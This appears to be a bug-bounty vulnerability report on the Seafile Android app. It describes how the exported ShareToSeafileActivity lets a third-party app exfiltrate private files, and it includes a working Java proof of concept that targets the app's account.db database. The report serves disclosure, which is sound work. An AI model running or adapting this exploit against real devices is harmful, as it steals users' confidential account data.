Vulnerability - Possible to steal any protected files on Android

[alustinoff]

Description

There is an issue that allows to retrieve any files from protected directory of application - /data/data/com.seafile.seadroid2/*. The issue is caused by exported activity com.seafile.seadroid2.ui.activity.ShareToSeafileActivity with intent filters SEND and android.intent.action.SEND_MULTIPLE that accept URI of files for upload. Any 3rd-party application could start this activity and upload on seafile server any files such as database file from protected directory.

For example the same vulnerabilities with similar impact in another apps:

• https://hackerone.com/reports/377107
• https://hackerone.com/reports/1454002

Proof of Concept

// Java_PoC.java
protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
        StrictMode.setVmPolicy(builder.build());
        Intent intent = new Intent("android.intent.action.SEND");
        intent.setClassName("com.seafile.seadroid2", "com.seafile.seadroid2.ui.activity.ShareToSeafileActivity");
        intent.setType("*/*");
        intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
        ArrayList mStreamsToUpload = new ArrayList<>();
        mStreamsToUpload.add(Uri.parse("file:///data/data/com.seafile.seadroid2/databases/account.db"));
        intent.putExtra("android.intent.extra.STREAM", mStreamsToUpload);
        startActivity(intent);
    }

Impact

This vulnerability is capable of stealing file with confidential data from protected directory of application.

Occurrences

https://github.com/haiwen/seadroid/blob/master/app/src/main/java/com/seafile/seadroid2/ui/activity/ShareToSeafileActivity.java#L118
There is not some check for directory /data/data.